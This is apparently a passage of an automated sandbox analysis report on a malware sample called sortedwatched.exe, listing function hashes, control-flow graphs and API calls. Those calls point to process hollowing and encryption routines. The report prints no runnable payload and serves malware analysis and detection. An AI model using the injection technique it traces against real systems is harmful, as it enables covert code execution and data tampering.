                  • Instruction ID: 9635907dda9a5e17e282c30758ca44114b1cbff450376e79b1047c8b36c29783
                  • Opcode Fuzzy Hash: 8ad48bf59bba2d8cda96442d10b01183ac7760b7c19d3faa8316632ce25345ad
                  • Instruction Fuzzy Hash: 91E04F333104A08BC622DA96D4C096BF3ADEB843B033A0969D54697A51C620BC009640
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 003E3743, Relevance: .0, Instructions: 3COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.322934550.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_3e0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
                  • Instruction ID: dd1ea78877d89c8c1f21003391c56dd86dd10fe21c56db2a52adb93900471d7c
                  • Opcode Fuzzy Hash: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
                  • Instruction Fuzzy Hash: 8EA00275752980CFCE12CB09C394F9073F4F744B41F0504F1E80997A11C238A900CA00
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Analysis Process: sortedwatched.exe PID: 3672 Parent PID: 3704 sortedwatched.exeUNIQUE

                  Execution Graph

                  Execution Coverage:12.4%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:10.2%
                  Total number of Nodes:186
                  Total number of Limit Nodes:3

                  Graph

                  execution_graph 3398 4f184f 3399 4f1867 3398->3399 3407 4f093f 3399->3407 3401 4f1873 3402 4f188d 3401->3402 3403 4f18d9 3401->3403 3410 4f12bf 3402->3410 3415 4f1f8f 3403->3415 3406 4f18ce 3418 4f213f GetPEB 3407->3418 3409 4f0d04 3409->3401 3411 4f093f GetPEB 3410->3411 3414 4f135e 3411->3414 3413 4f139f 3413->3406 3414->3413 3420 4f219f GetPEB 3414->3420 3416 4f12bf 2 API calls 3415->3416 3417 4f1f99 3416->3417 3417->3406 3419 4f2169 3418->3419 3419->3409 3421 4f21c9 3420->3421 3421->3414 3422 4f1bcf 3423 4f1bfc 3422->3423 3430 4f1bf2 3422->3430 3424 4f093f GetPEB 3423->3424 3423->3430 3425 4f1c3e 3424->3425 3426 4f1d5c 3425->3426 3427 4f1c5c 3425->3427 3431 4f200f 3426->3431 3429 4f12bf 2 API calls 3427->3429 3429->3430 3432 4f12bf 2 API calls 3431->3432 3433 4f2019 3432->3433 3433->3430 3446 4f15df 3447 4f1600 3446->3447 3448 4f093f GetPEB 3447->3448 3449 4f160c 3448->3449 3450 4f162a 3449->3450 3451 4f16c0 3449->3451 3452 4f12bf 2 API calls 3450->3452 3455 4f1f6f 3451->3455 3454 4f16a7 3452->3454 3456 4f12bf 2 API calls 3455->3456 3457 4f1f79 3456->3457 3457->3454 3551 4f123f 3552 4f1271 3551->3552 3553 4f093f GetPEB 3552->3553 3554 4f127d 3553->3554 3522 5009b1 3529 4fe40d 3522->3529 3524 5009c2 3532 4ff4c3 3524->3532 3526 5009c7 3528 500a5f 3526->3528 3535 4fe18d 3526->3535 3539 4f2c0c GetPEB 3529->3539 3531 4ff4af 3531->3524 3533 4f2c0c GetPEB 3532->3533 3534 50099d 3533->3534 3534->3526 3537 4fe19b 3535->3537 3536 4fe1e4 3536->3526 3537->3536 3541 4fe0ce 3537->3541 3540 4f2c21 3539->3540 3540->3531 3542 4fe0d9 3541->3542 3545 4fe0df 3541->3545 3542->3545 3546 4fdfc1 3542->3546 3544 4fe106 3544->3537 3545->3537 3547 4fdfce 3546->3547 3550 4f3743 GetPEB 3547->3550 3549 4fe000 3549->3544 3550->3549 3458 5b1dc0 3459 5b1ded 3458->3459 3460 5b1000 GetPEB 3459->3460 3461 5b1df9 3460->3461 3462 5b2ad0 IsWow64Process 3461->3462 3463 5b1e0f 3462->3463 3464 5b1ecd 3463->3464 3465 5b1e17 3463->3465 3469 5b2610 3464->3469 3467 5b1980 9 API calls 3465->3467 3468 5b1ead 3467->3468 3470 5b1980 9 API calls 3469->3470 3471 5b261a 3470->3471 3471->3468 3273 4f0000 3275 4f0005 3273->3275 3278 4f002d 3275->3278 3298 4f0467 GetPEB 3278->3298 3281 4f0467 GetPEB 3282 4f0053 3281->3282 3283 4f0467 GetPEB 3282->3283 3284 4f0061 3283->3284 3285 4f0467 GetPEB 3284->3285 3286 4f006d 3285->3286 3287 4f0467 GetPEB 3286->3287 3288 4f007b 3287->3288 3289 4f0467 GetPEB 3288->3289 3292 4f0089 3289->3292 3290 4f00e6 GetNativeSystemInfo 3291 4f0109 VirtualAlloc 3290->3291 3296 4f0029 3290->3296 3294 4f0135 3291->3294 3292->3290 3292->3296 3293 4f03c3 3300 5b1900 3293->3300 3294->3293 3295 4f0384 VirtualProtect 3294->3295 3295->3294 3295->3296 3299 4f0045 3298->3299 3299->3281 3301 5b1932 3300->3301 3306 5b1000 3301->3306 3303 5b193e 3309 5b1470 3303->3309 3305 5b196c ExitProcess 3305->3296 3325 5b2800 GetPEB 3306->3325 3308 5b13c5 3308->3303 3320 5b1486 3309->3320 3310 5b153d 3311 5b1569 CreateProcessW 3314 5b1578 3311->3314 3311->3320 3312 5b159e ReadProcessMemory 3312->3314 3312->3320 3314->3310 3360 5b20a0 3314->3360 3316 5b20a0 10 API calls 3316->3320 3317 5b2290 10 API calls 3317->3320 3319 5b1820 SetThreadContext 3319->3314 3319->3320 3320->3310 3320->3311 3320->3312 3320->3314 3320->3316 3320->3317 3320->3319 3322 5b1858 CloseHandle 3320->3322 3323 5b1865 CloseHandle 3320->3323 3324 5b1872 CloseHandle 3320->3324 3327 5b2150 3320->3327 3338 5b1ca0 3320->3338 3349 5b1fd0 3320->3349 3322->3320 3323->3320 3324->3320 3326 5b282a 3325->3326 3326->3308 3328 5b2171 3327->3328 3329 5b1000 GetPEB 3328->3329 3330 5b217d 3329->3330 3371 5b2ad0 3330->3371 3332 5b2193 3333 5b225b 3332->3333 3334 5b219b 3332->3334 3335 5b26b0 9 API calls 3333->3335 3336 5b1980 9 API calls 3334->3336 3337 5b2242 3335->3337 3336->3337 3337->3320 3339 5b1cc1 3338->3339 3340 5b1000 GetPEB 3339->3340 3341 5b1ccd 3340->3341 3342 5b2ad0 IsWow64Process 3341->3342 3343 5b1ce3 3342->3343 3344 5b1ceb 3343->3344 3345 5b1d81 3343->3345 3377 5b1980 3344->3377 3374 5b2630 3345->3374 3348 5b1d68 3348->3320 3350 5b1ff1 3349->3350 3351 5b1000 GetPEB 3350->3351 3352 5b1ffd 3351->3352 3353 5b2ad0 IsWow64Process 3352->3353 3354 5b2013 3353->3354 3355 5b2063 3354->3355 3356 5b2017 3354->3356 3392 5b2670 3355->3392 3357 5b1980 9 API calls 3356->3357 3359 5b2058 3357->3359 3359->3320 3361 5b20b8 3360->3361 3362 5b1000 GetPEB 3361->3362 3363 5b20c4 3362->3363 3364 5b2ad0 IsWow64Process 3363->3364 3365 5b20da 3364->3365 3366 5b212a 3365->3366 3367 5b20de 3365->3367 3395 5b2690 3366->3395 3368 5b1980 9 API calls 3367->3368 3370 5b211f 3368->3370 3370->3310 3372 5b2adc IsWow64Process 3371->3372 3373 5b2ae9 3371->3373 3372->3373 3375 5b1980 9 API calls 3374->3375 3376 5b263a 3375->3376 3376->3348 3378 5b1000 GetPEB 3377->3378 3387 5b1a1f 3378->3387 3380 5b1a50 CreateFileW 3382 5b1a60 3380->3382 3380->3387 3381 5b1a7f VirtualAlloc 3381->3382 3383 5b1aa0 ReadFile 3381->3383 3384 5b1c8f 3382->3384 3385 5b1c7e VirtualFree 3382->3385 3383->3382 3386 5b1ac1 VirtualAlloc 3383->3386 3384->3348 3385->3384 3386->3382 3386->3387 3387->3381 3387->3382 3388 5b1b89 CloseHandle 3387->3388 3389 5b1b99 VirtualFree 3387->3389 3390 5b2860 GetPEB 3387->3390 3388->3387 3389->3387 3391 5b288a 3390->3391 3391->3380 3393 5b1980 9 API calls 3392->3393 3394 5b267a 3393->3394 3394->3359 3396 5b1980 9 API calls 3395->3396 3397 5b269a 3396->3397 3397->3370

                  Executed Functions

                  Function 005B26D0, Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000B.00000002.327417458.005B1000.00000020.00000001.sdmp, Offset: 005B1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_5b1000_sortedwatched.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: f8b49f3466dcbdd5e63a53c087d3b72389dbc28b21cd111d0a4e51603c5f5366
                  • Instruction ID: 5b22184551d952ad6e51ed859c2a3657e2061e0225f2d8d3c8f38d92b4265cd5
                  • Opcode Fuzzy Hash: f8b49f3466dcbdd5e63a53c087d3b72389dbc28b21cd111d0a4e51603c5f5366
                  • Instruction Fuzzy Hash: 6F90023DB164B60212857BE005BA9DAA94439D07807844005E002000424E10A4389D37
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 005B2670, Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 409 5b2670-5b267f call 5b1980 call 5b2600
                  Memory Dump Source
                  • Source File: 0000000B.00000002.327417458.005B1000.00000020.00000001.sdmp, Offset: 005B1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_5b1000_sortedwatched.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: ab4c8c7f3a2b842a710522aa320b236c56b36bc81bbfa36c8a26bf4290abe6ea
                  • Instruction ID: 78f63b87ff701ce4c34c54f25c4eedddcd731db931bf4b9951e86f5bc7492b1f
                  • Opcode Fuzzy Hash: ab4c8c7f3a2b842a710522aa320b236c56b36bc81bbfa36c8a26bf4290abe6ea
                  • Instruction Fuzzy Hash: 5590027AE408624122817BE1057BDDA9E043BE1B807845005A081000030C0136149137
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 005B2630, Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 404 5b2630-5b263f call 5b1980 call 5b2600
                  Memory Dump Source
                  • Source File: 0000000B.00000002.327417458.005B1000.00000020.00000001.sdmp, Offset: 005B1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_5b1000_sortedwatched.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 77813ec1177f64da510f27dc46ca843b65ce5602e39920573ebb61a44d39366a
                  • Instruction ID: c36bf6e553d1c984fd8079da0bf4c5155908c2b9f90c5077af0200a18ac69e30
                  • Opcode Fuzzy Hash: 77813ec1177f64da510f27dc46ca843b65ce5602e39920573ebb61a44d39366a
                  • Instruction Fuzzy Hash: C99002395004464232417FF4047EBDA59003BD8780FC84501A14A405135D102410E437
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 005B26B0, Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 419 5b26b0-5b26bf call 5b1980 call 5b2600
                  Memory Dump Source
                  • Source File: 0000000B.00000002.327417458.005B1000.00000020.00000001.sdmp, Offset: 005B1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_5b1000_sortedwatched.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 14b9b3d89ed45de54cd9d34dc8431c11ec78ab6fb982c160575ebb8bab00b8b2
                  • Instruction ID: b50b5b069b526e5ab96bf69fa59492b6ca41e84a23b8fcfc8f7a93e270e2889c
                  • Opcode Fuzzy Hash: 14b9b3d89ed45de54cd9d34dc8431c11ec78ab6fb982c160575ebb8bab00b8b2
                  • Instruction Fuzzy Hash: 6990023FA004464213407BE028BAFDA5A4479E47D07854009E005505035D006410A037
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 003F0000, Relevance: 144.4, Strings: 115, Instructions: 616UNIQUE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 3f0000-3f000d 1 3f000f-3f0013 0->1 2 3f0015-3f0017 0->2 1->2 3 3f001c-3f0c58 call 3f0db0 1->3 4 3f0da6-3f0da9 2->4 12 3f0c5a-3f0c6e 3->12 13 3f0c90-3f0cbd 3->13 12->13 18 3f0c70-3f0c87 12->18 16 3f0cbf-3f0cc1 13->16 17 3f0cc6-3f0cd0 13->17 16->4 19 3f0ce1-3f0cea 17->19 18->13 23 3f0c89-3f0c8b 18->23 20 3f0cec-3f0d06 19->20 21 3f0d08-3f0d1c 19->21 20->19 25 3f0d2d-3f0d34 21->25 23->4 26 3f0d36-3f0d41 25->26 27 3f0d43-3f0d72 25->27 26->25 29 3f0d76-3f0d78 27->29 30 3f0d7e-3f0d9b 29->30 31 3f0d7a-3f0d7c 29->31 33 3f0d9d-3f0d9f 30->33 34 3f0da1 30->34 31->4 33->4 34->4
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.327239879.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_3f0000_sortedwatched.jbxd
                  Similarity
                  • API ID:
                  • String ID: $ $ $ $!$!$#$$$'$+$-$.$.$1$2$2$3$5$5$5$5$6$6$8$:$<$<$=$>$>$?$A$A$A$B$B$CryptAcquireContextA$CryptEncrypt$CryptImportKey$D$E$H$H$I$J$K$K$L$L$M$N$R$R$R$R$S$S$V$W$W$[$[$[$\$\$`$`$a$advapi32.dll$c$d$e$e$e$e$e$e$g$g$g$h$h$i$i$k$k$n$n$o$p$p$q$q$r$s$s$s$t$t$t$u$u$u$u$u$v$x$x$x$}$}$}$~$~$~
                  • API String ID: 0-3394408708
                  • Opcode ID: 360789facf9acdbb35299756f2f936d2c052fbc7d21058e99c2ecf0cc8d9053c
                  • Instruction ID: 14711ee5e188ecba898f9116ffc46728861fe54a66dabe4d5da8b1e21ad529b3
                  • Opcode Fuzzy Hash: 360789facf9acdbb35299756f2f936d2c052fbc7d21058e99c2ecf0cc8d9053c
                  • Instruction Fuzzy Hash: A692562090C7D9D9EB32C6788C587DDBEB11B27318F0841D9D1D83A2D2C7BA1B85DB66
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 005B1980, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 239fileUNIQUE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 35 5b1980-5b1a2e call 5b1000 38 5b1a35-5b1a5e call 5b2860 CreateFileW 35->38 41 5b1a60 38->41 42 5b1a65-5b1a78 38->42 43 5b1bb9-5b1bbd 41->43 47 5b1a7a 42->47 48 5b1a7f-5b1a99 VirtualAlloc 42->48 45 5b1bbf-5b1bc3 43->45 46 5b1c05-5b1c08 43->46 50 5b1bcf-5b1bd3 45->50 51 5b1bc5-5b1bc8 45->51 49 5b1c0b-5b1c12 46->49 47->43 54 5b1a9b 48->54 55 5b1aa0-5b1aba ReadFile 48->55 56 5b1c67-5b1c7c 49->56 57 5b1c14-5b1c1f 49->57 52 5b1be6-5b1bea 50->52 53 5b1bd5-5b1bdf 50->53 51->50 60 5b1bfd 52->60 61 5b1bec-5b1bf6 52->61 53->52 54->43 62 5b1abc 55->62 63 5b1ac1-5b1b01 VirtualAlloc 55->63 58 5b1c8f-5b1c97 56->58 59 5b1c7e-5b1c89 VirtualFree 56->59 64 5b1c23-5b1c2f 57->64 65 5b1c21 57->65 59->58 60->46 61->60 62->43 66 5b1b08-5b1b23 call 5b2ab0 63->66 67 5b1b03 63->67 68 5b1c43-5b1c4f 64->68 69 5b1c31-5b1c41 64->69 65->56 75 5b1b2e-5b1b38 66->75 67->43 72 5b1c5c-5b1c62 68->72 73 5b1c51-5b1c5a 68->73 71 5b1c65 69->71 71->49 72->71 73->71 76 5b1b6b-5b1b7f call 5b28c0 75->76 77 5b1b3a-5b1b69 call 5b2ab0 75->77 83 5b1b83-5b1b87 76->83 84 5b1b81 76->84 77->75 85 5b1b89-5b1b8d CloseHandle 83->85 86 5b1b93-5b1b97 83->86 84->43 85->86 87 5b1baa-5b1bb3 86->87 88 5b1b99-5b1ba4 VirtualFree 86->88 87->38 87->43 88->87
                  APIs
                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 005B1A51
                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 005B1C89
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.327417458.005B1000.00000020.00000001.sdmp, Offset: 005B1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_5b1000_sortedwatched.jbxd
                  Similarity
                  • API ID: CreateFileFreeVirtual
                  • String ID: |"[
                  • API String ID: 204039940-4188112506
                  • Opcode ID: 61ae92364ca28658410062bed1a011159a615ec3b8f6d1c7bbb5100bd63cb779
                  • Instruction ID: e1fc85217665e4b888f519870a559888b053fd054c516336cb35b84319adde11
                  • Opcode Fuzzy Hash: 61ae92364ca28658410062bed1a011159a615ec3b8f6d1c7bbb5100bd63cb779
                  • Instruction Fuzzy Hash: C5A11A74E00609EBDB54CFA4C998BEEBBB5FF48305F208599E505BB280D775AE40CB94
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 005B1470, Relevance: 9.4, APIs: 6, Instructions: 383processCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 89 5b1470-5b1504 call 5b2a90 * 3 96 5b151b 89->96 97 5b1506-5b1510 89->97 99 5b1522-5b153b 96->99 97->96 98 5b1512-5b1519 97->98 98->99 101 5b153d-5b1540 99->101 102 5b1545 99->102 103 5b18e7-5b18e9 101->103 104 5b154c-5b1576 CreateProcessW 102->104 106 5b1578 104->106 107 5b157d-5b1597 104->107 108 5b1899-5b189d 106->108 112 5b1599 107->112 113 5b159e-5b15b9 ReadProcessMemory 107->113 110 5b189f-5b18a3 108->110 111 5b18e5 108->111 114 5b18b5-5b18b9 110->114 115 5b18a5-5b18b1 110->115 111->103 112->108 118 5b15bb 113->118 119 5b15c0-5b15c9 113->119 116 5b18bb-5b18be 114->116 117 5b18c2-5b18c6 114->117 115->114 116->117 120 5b18c8-5b18cb 117->120 121 5b18cf-5b18d3 117->121 118->108 122 5b15cb-5b15da 119->122 123 5b15f2-5b160e call 5b2150 119->123 120->121 126 5b18e0-5b18e3 121->126 127 5b18d5-5b18db call 5b20a0 121->127 122->123 128 5b15dc-5b15e4 call 5b20a0 122->128 132 5b1610 123->132 133 5b1615-5b1638 call 5b2290 123->133 126->103 127->126 134 5b15e9-5b15eb 128->134 132->108 138 5b163a-5b163e 133->138 139 5b167f-5b16a0 call 5b2290 133->139 134->123 135 5b15ed 134->135 135->108 141 5b167a 138->141 142 5b1640-5b1671 call 5b2290 138->142 145 5b16a2 139->145 146 5b16a7-5b16c5 call 5b2ab0 139->146 141->108 149 5b1678 142->149 150 5b1673 142->150 145->108 152 5b16d0-5b16da 146->152 149->139 150->108 153 5b16dc-5b170e call 5b2ab0 152->153 154 5b1710-5b1714 152->154 153->152 156 5b171a-5b172a 154->156 157 5b17ff-5b181c call 5b1ca0 154->157 156->157 160 5b1730-5b1740 156->160 164 5b181e 157->164 165 5b1820-5b183f SetThreadContext 157->165 160->157 163 5b1746-5b176a 160->163 166 5b176d-5b1771 163->166 164->108 168 5b1843-5b184e call 5b1fd0 165->168 169 5b1841 165->169 166->157 167 5b1777-5b178c 166->167 170 5b17a0-5b17a4 167->170 175 5b1852-5b1856 168->175 176 5b1850 168->176 169->108 172 5b17e2-5b17fa 170->172 173 5b17a6-5b17b2 170->173 172->166 177 5b17e0 173->177 178 5b17b4-5b17de 173->178 179 5b1858-5b185c CloseHandle 175->179 180 5b185f-5b1863 175->180 176->108 177->170 178->177 179->180 182 5b186c-5b1870 180->182 183 5b1865-5b1869 CloseHandle 180->183 184 5b1879-5b187d 182->184 185 5b1872-5b1876 CloseHandle 182->185 183->182 186 5b188a-5b1893 184->186 187 5b187f-5b1885 call 5b20a0 184->187 185->184 186->104 186->108 187->186
                  APIs
                  • CreateProcessW.KERNEL32(?,00000000), ref: 005B1571
                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 005B15B4
                  Memory Dump Source
                  • Source File: 0000000B.00000002.327417458.005B1000.00000020.00000001.sdmp, Offset: 005B1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_5b1000_sortedwatched.jbxd
                  Similarity
                  • API ID: Process$CreateMemoryRead
                  • String ID:
                  • API String ID: 2726527582-0
                  • Opcode ID: 475f0689a72174ff0ae04c85c88f1a3403d427bfc216527feeb2969a55ebaa05
                  • Instruction ID: 92b10ecb76c04752be4baa5a40c09cf8cf908d19a9d7e1de541232650975efb9
                  • Opcode Fuzzy Hash: 475f0689a72174ff0ae04c85c88f1a3403d427bfc216527feeb2969a55ebaa05
                  • Instruction Fuzzy Hash: 9AF14975E00609EBDB58CF98C895FEEBBB5FF88300F608558F616AB280D774A941CB54
                  Uniqueness

                  Uniqueness Score: 5.06%

                  Function 004F002D, Relevance: 4.9, APIs: 3, Instructions: 392memoryUNIQUE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 189 4f002d-4f009e call 4f0467 * 6 202 4f00a7-4f00b0 189->202 203 4f00a0-4f00a2 189->203 202->203 205 4f00b2-4f00b6 202->205 204 4f045f-4f0466 203->204 205->203 206 4f00b8-4f00c2 205->206 207 4f00e6-4f0107 GetNativeSystemInfo 206->207 208 4f00c4-4f00c7 206->208 207->203 210 4f0109-4f0133 VirtualAlloc 207->210 209 4f00c9-4f00cf 208->209 211 4f00d6 209->211 212 4f00d1-4f00d4 209->212 213 4f016c-4f0176 210->213 214 4f0135-4f013d 210->214 217 4f00d9-4f00e4 211->217 212->217 215 4f0178-4f017d 213->215 216 4f01b0-4f01c1 213->216 218 4f013f-4f0142 214->218 219 4f0181-4f0194 215->219 220 4f01c3-4f01dd 216->220 221 4f0240-4f024c 216->221 217->207 217->209 222 4f015d-4f015f 218->222 223 4f0144-4f014c 218->223 224 4f0196-4f019f 219->224 225 4f01a5-4f01aa 219->225 242 4f01df 220->242 243 4f022e-4f023a 220->243 226 4f02fc-4f0306 221->226 227 4f0252-4f0269 221->227 229 4f0161-4f0166 222->229 223->222 228 4f014e-4f0151 223->228 224->224 230 4f01a1 224->230 225->219 233 4f01ac 225->233 231 4f030c-4f0313 226->231 232 4f03c3-4f03d8 call 5b1900 226->232 227->226 234 4f026f-4f027f 227->234 236 4f0158-4f015b 228->236 237 4f0153-4f0156 228->237 229->218 238 4f0168 229->238 230->225 239 4f0315-4f031e 231->239 263 4f03da-4f03df 232->263 233->216 240 4f02e1-4f02f2 234->240 241 4f0281-4f0285 234->241 236->229 237->222 237->236 238->213 246 4f03b8-4f03bd 239->246 247 4f0324-4f033e 239->247 240->234 244 4f02f8 240->244 248 4f0286-4f0295 241->248 250 4f01e3-4f01e7 242->250 243->220 245 4f023c 243->245 244->226 245->221 246->232 246->239 251 4f0358-4f035a 247->251 252 4f0340-4f0342 247->252 253 4f029d-4f02a6 248->253 254 4f0297-4f029b 248->254 255 4f01e9 250->255 256 4f0207-4f0210 250->256 261 4f035c-4f035e 251->261 262 4f0373-4f0375 251->262 257 4f034b-4f034e 252->257 258 4f0344-4f0349 252->258 260 4f02cf-4f02d3 253->260 254->253 259 4f02a8-4f02ad 254->259 255->256 264 4f01eb-4f0205 255->264 265 4f0213-4f0228 256->265 269 4f0350-4f0356 257->269 258->269 270 4f02af-4f02be 259->270 271 4f02c0-4f02c3 259->271 260->248 266 4f02d5-4f02dd 260->266 272 4f0364-4f0366 261->272 273 4f0360-4f0362 261->273 267 4f037c-4f0381 262->267 268 4f0377 262->268 274 4f045d 263->274 275 4f03e1-4f03e5 263->275 264->265 265->250 277 4f022a 265->277 266->240 279 4f0384-4f03ae VirtualProtect 267->279 278 4f0379-4f037a 268->278 269->279 270->260 271->260 280 4f02c5-4f02cb 271->280 272->262 276 4f0368-4f036a 272->276 273->278 274->204 275->274 281 4f03e7-4f03f1 275->281 276->279 283 4f036c-4f0371 276->283 277->243 278->279 279->203 284 4f03b4 279->284 280->260 281->274 282 4f03f3-4f03f7 281->282 282->274 285 4f03f9-4f040a 282->285 283->279 284->246 285->274 286 4f040c-4f0411 285->286 287 4f0413-4f0420 286->287 287->287 288 4f0422-4f0426 287->288 289 4f043e-4f0444 288->289 290 4f0428-4f043a 288->290 289->274 292 4f0446-4f045c 289->292 290->286 291 4f043c 290->291 291->274 292->274
                  APIs
                  • GetNativeSystemInfo.KERNEL32(?,?,?,?,004F0005), ref: 004F00EB
                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,004F0005), ref: 004F0113
                  Memory Dump Source
                  • Source File: 0000000B.00000002.327369163.004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_4f0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocInfoNativeSystemVirtual
                  • String ID:
                  • API String ID: 2032221330-0
                  • Opcode ID: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                  • Instruction ID: 0d931faa63895d7dd2ca997f914aedf8a1153a0a819d97dfaf6c798800f0ad34
                  • Opcode Fuzzy Hash: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                  • Instruction Fuzzy Hash: ACE19D71A0430A8FDB24CF19C94473AB3E1BF94318F18456EEA959B342E778EC45CB99
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 005B1900, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 295 5b1900-5b1978 call 5b18f0 call 5b1000 call 5b1470 ExitProcess
                  APIs
                  • ExitProcess.KERNELBASE(00000000), ref: 005B196E
                  Memory Dump Source
                  • Source File: 0000000B.00000002.327417458.005B1000.00000020.00000001.sdmp, Offset: 005B1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_5b1000_sortedwatched.jbxd
                  Similarity
                  • API ID: ExitProcess
                  • String ID:
                  • API String ID: 621844428-0
                  • Opcode ID: a5aec3077a1aef0a8e1e163df17a60c2dd07410263231ed868c6747be48560c5
                  • Instruction ID: 48dbe75896303477c34e6478e921c6281f02bc0c4b3ee1e99bfad294c86a23a5
                  • Opcode Fuzzy Hash: a5aec3077a1aef0a8e1e163df17a60c2dd07410263231ed868c6747be48560c5
                  • Instruction Fuzzy Hash: 0DF0AF31D0010D9BEB10EFB4C8197DEFBB9BB44310F40809AAA0467241FA312A0A8BD5
                  Uniqueness

                  Uniqueness Score: 0.01%

                  Function 005B2AD0, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 302 5b2ad0-5b2ada 303 5b2afd 302->303 304 5b2adc-5b2ae7 IsWow64Process 302->304 305 5b2aff-5b2b01 303->305 306 5b2ae9-5b2aef 304->306 307 5b2af1 304->307 308 5b2af8-5b2afb 306->308 307->308 308->305
                  APIs
                  • IsWow64Process.KERNELBASE(000000FF,?), ref: 005B2AE2
                  Memory Dump Source
                  • Source File: 0000000B.00000002.327417458.005B1000.00000020.00000001.sdmp, Offset: 005B1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_5b1000_sortedwatched.jbxd
                  Similarity
                  • API ID: ProcessWow64
                  • String ID:
                  • API String ID: 2092917072-0
                  • Opcode ID: d21ada0f03506ed7b8d9338585bf88dcd0351a5368995a6b8cb6ecbbda461e73
                  • Instruction ID: 515555d13a04592d8d1cca4e08c792f745957b7c1dd1960d376bab71ecff6e00
                  • Opcode Fuzzy Hash: d21ada0f03506ed7b8d9338585bf88dcd0351a5368995a6b8cb6ecbbda461e73
                  • Instruction Fuzzy Hash: A6E01A30909648EBCB24DE9888447EDBBB8BB00311F100265E811D2280D7B5AE44E761
                  Uniqueness

                  Uniqueness Score: 0.16%

                  Non-executed Functions

                  Function 004F48C1, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 416UNIQUE
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.327369163.004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_4f0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: _memset
                  • String ID: PO
                  • API String ID: 2102423945-3102315977
                  • Opcode ID: 2e1f4a3d71298718943c742f06d25169e691f0727c0f0a72c82688ee7d13fe6c
                  • Instruction ID: ff45062b41a3753ffbf06791dd6c043620541a1b199a0526feb82740c1a555a9
                  • Opcode Fuzzy Hash: 2e1f4a3d71298718943c742f06d25169e691f0727c0f0a72c82688ee7d13fe6c
